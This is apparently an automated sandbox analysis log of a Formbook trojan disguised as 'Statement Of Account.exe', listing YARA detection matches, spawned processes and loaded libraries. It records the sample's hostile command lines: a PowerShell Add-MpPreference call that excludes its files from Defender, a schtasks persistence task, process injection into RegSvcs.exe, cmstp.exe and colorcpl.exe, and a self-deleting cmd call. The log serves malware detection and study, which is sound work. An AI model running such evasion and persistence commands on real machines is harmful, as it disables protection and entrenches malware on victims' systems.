Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014BEA80 14_2_014BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C3D40 14_2_014C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C8DC0 14_2_014C8DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014D8DBF 14_2_014D8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C0C00 14_2_014C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014D9C20 14_2_014D9C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B2FC8 14_2_014B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01483FD2 14_2_01483FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01483FD5 14_2_01483FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014CCFE0 14_2_014CCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C1F92 14_2_014C1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C0E59 14_2_014C0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014D2E90 14_2_014D2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C9EB0 14_2_014C9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00FEEA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00FC7EB0 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00FC7E54 appears 116 times
Source: Statement Of Account.exe, 00000000.00000002.1704225673.0000000004B83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000000.1668852535.0000000000C34000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIuBP.exeF vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1712844282.0000000005B50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1717785891.000000000A290000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1700380760.000000000119E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Statement Of Account.exe
Source: Statement Of Account.exe Binary or memory string: OriginalFilenameIuBP.exeF vs Statement Of Account.exe
Source: Statement Of Account.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Statement Of Account.exe PID: 6744, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7572, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmstp.exe PID: 7592, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 7600, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Statement Of Account.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SdYCcXyq.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: _0020.SetAccessControl
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: _0020.AddAccessRule
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: _0020.SetAccessControl
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.evad.winEXE@227/15@4/3
Source: C:\Users\user\Desktop\Statement Of Account.exe File created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
Source: C:\Users\user\Desktop\Statement Of Account.exe File created: C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp
Source: Statement Of Account.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Statement Of Account.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Statement Of Account.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Statement Of Account.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\Statement Of Account.exe File read: C:\Users\user\Desktop\Statement Of Account.exe:Zone.Identifier
Source: unknown Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe C:\Users\user\AppData\Roaming\SdYCcXyq.exe
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
